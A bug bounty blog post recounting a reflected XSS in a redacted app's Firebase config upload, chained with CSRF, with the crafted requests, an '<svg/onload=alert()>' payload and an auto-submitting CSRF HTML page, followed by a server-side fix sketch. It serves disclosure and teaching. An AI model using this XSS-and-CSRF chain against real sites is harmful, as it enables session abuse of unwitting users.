Dollars and Detectives: A Unique Way to XSS Mysteries (Not a Simple One) for a $150 Reward

Nauman Khan
Dec 11, 2023

In the name of God, the Most Gracious, the Most Merciful

Introduction:

Greetings cybersecurity enthusiasts! I’m Nauman Khan, and I’m thrilled to have you join me on yet another thrilling journey through the dynamic world of digital security. In our last encounter, we dived deep into the detection methods of SQL injection, uncovering potential vulnerabilities within web applications. If you missed that adventure, you can catch up on the SQL injection on an AI website.

Today, our exploration continues with a focus on Cross-Site Scripting (XSS), where an enticing $150 bounty awaits the savvy explorer. Together, we’ll unravel the mysteries of XSS, understand its implications, and perhaps claim that enticing reward.

But before we dive in, let’s connect! Join me on LinkedIn, where we can foster a community of cybersecurity enthusiasts, share knowledge, and embark on these exciting digital quests together. So, fasten your seatbelts, and let’s navigate the ever-evolving landscape of cybersecurity — one blog at a time. Happy reading and happy connecting!

The Discovery:

In our digital adventure, we stumbled upon a function while testing. The application creates a mobile app using AI, and it asks us to upload a Firebase config file containing some JSON.

Specifically, we found an interesting behavior during the upload of a JSON file using this Firebase Config Upload feature.

The Behaviour:

The app sends a POST request with multipart/form-data.

POST /api/firebase-config-upload HTTP/1.1
Host: redacted.com
Cookie: [Your_Cookies_Here]
Content-Type: multipart/form-data; boundary=---------------------------[BOUNDARY]

-----------------------------[BOUNDARY]
Content-Disposition: form-data; name="data"

{"anydatahere":"anyvaluehere"}
-----------------------------[BOUNDARY]
Content-Disposition: form-data; name="appId"

123456
-----------------------------[BOUNDARY]
Content-Disposition: form-data; name="filetype"

json
-----------------------------[BOUNDARY]--

As you can see, there are three parameters: data, appId and filetype. The data parameter holds the JSON file we are uploading, appId is the ID of the app we are working on, and filetype has the value json.

The server returns a response something like this:

HTTP/1.1 200 OK
Server: [Server]
Content-Type: text/html
Content-Length: [Length]
Connection: keep-alive
[Additional-Headers-Here]

{
"status": "success",
"message": "Upload successful!",
"appId": "123456"
}

Analyzing the Quirk:

Upon a more detailed examination, we identified two primary anomalies. First, the server returned the user-supplied appId parameter without proper sanitization, potentially exposing the application to Cross-Site Scripting (XSS) attacks. Second, the Content-Type header in the server response was mistakenly set to text/html instead of the more appropriate application/json. (go up and check again)

Replicating the Vulnerability:

  1. Start by logging into your Redacted account and navigating to the app settings.
  2. Within the app settings, find and explore the “Advance Settings” section.
  3. In this section there is a feature to upload a Firebase config file.
  4. Use a tool like Burp Suite to intercept the multipart form request during the Firebase Config Upload. Identify the key components: data, appId, and filetype.
  5. Craft a manipulated payload within the appId field. This is where we introduced a potential issue: <svg/onload=alert()>.
  6. Simulate the upload of a JSON file to see the vulnerability in action.
  7. Check the server response to confirm that the appId field is reflected without proper validation.

HTTP/1.1 200 OK
Server: [Server]
Content-Type: text/html
Content-Length: [Length]
Connection: keep-alive
[Additional-Headers-Here]

{
"status": "success",
"message": "Upload successful!",
"appId": "<svg/onload=alert(document.domain)>"
}

Because the Content-Type is set to text/html, the browser renders the response as HTML and the XSS triggers.

CSRF Exploitation:

  1. Now the problem is how to send multipart/form-data as a cross-site request.
  2. Use Burp Pro’s CSRF PoC generator to adapt the request for easier exploitation.
  3. Change the request so that it sends the data as application/x-www-form-urlencoded.
  4. The request then looks like this:

POST /api/firebase-config-upload HTTP/1.1
Host: redacted.com
Cookie: [Your_Cookies_Here]
Content-Length:
Content-Type: application/x-www-form-urlencoded

data=%7B%22data%22%3A%22value%22%7D&appId=%3Csvg%2Fonload%3Dalert()%3E&filetype=json

  5. The response triggers the XSS as expected.

The CSRF Exploit Code:

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CSRF Trigger</title>
</head>
<body>

<form id="csrf-form" action="https://redacted.com/api/firebase-config-upload" method="POST">
<input type="hidden" name="data" value='{"data":"value"}'>
<input type="hidden" name="appId" value='<svg/onload=alert()>'>
<input type="hidden" name="filetype" value="json">
<input type="submit" value="Trigger CSRF">
</form>

<script>
// Automatically submit the form when the page loads
document.getElementById('csrf-form').submit();
</script>

</body>
</html>
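
The three weaknesses this write-up chains (an unvalidated appId echoed back, a JSON body served as text/html, and an endpoint that accepts a cross-site form post) can each be closed on the server. The sketch below is an added example, not code from the affected application; the trusted origin, the digits-only appId format, the attacker.example origin and the shape of the req object are assumptions made for illustration.

```javascript
// Added example (not the vendor's code). Assumptions: the trusted origin,
// a digits-only appId format, and the { headers, fields } request shape.
const TRUSTED_ORIGINS = new Set(["https://redacted.com"]);
const APP_ID_PATTERN = /^[0-9]{1,12}$/;

// JSON.stringify leaves <, > and & as-is; escape them so the body stays
// inert even if something downstream treats it as HTML.
function safeJson(value) {
  return JSON.stringify(value).replace(/[<>&]/g,
    (c) => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

function reply(status, payload) {
  return {
    status,
    headers: {
      "Content-Type": "application/json; charset=utf-8", // not text/html
      "X-Content-Type-Options": "nosniff", // forbid MIME sniffing
    },
    body: safeJson(payload),
  };
}

function handleConfigUpload(req) {
  // A form auto-submitted from another site carries a foreign Origin.
  const origin = req.headers["origin"];
  if (!origin || !TRUSTED_ORIGINS.has(origin)) {
    return reply(403, { status: "error", message: "Cross-site request rejected" });
  }
  // The legitimate client sends multipart/form-data; refuse other encodings.
  const type = (req.headers["content-type"] || "").toLowerCase();
  if (!type.startsWith("multipart/form-data")) {
    return reply(415, { status: "error", message: "Unsupported content type" });
  }
  // Validate appId before echoing it; never reflect a rejected value.
  const appId = String(req.fields.appId || "");
  if (!APP_ID_PATTERN.test(appId)) {
    return reply(400, { status: "error", message: "Invalid appId" });
  }
  return reply(200, { status: "success", message: "Upload successful!", appId });
}

// Constructed sample: the cross-site form submission shown in the post.
const sampleCsrf = {
  headers: { origin: "https://attacker.example", "content-type": "application/x-www-form-urlencoded" },
  fields: { data: '{"data":"value"}', appId: "<svg/onload=alert()>", filetype: "json" },
};
console.log(handleConfigUpload(sampleCsrf).status); // 403
```

The Origin allowlist works alongside per-session CSRF tokens and SameSite cookies; it is not a substitute for them.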

Conclusion:

After long months of waiting and some heated talks, I got a mail one day that presented me with the $150 bounty and set the severity to Medium (P3).

In this beginner-friendly exploration, we’ve uncovered a vulnerability in Redacted’s Firebase Config Upload. Understanding these steps empowers us to contribute to a more secure digital environment. Keep learning, stay curious, and happy coding!
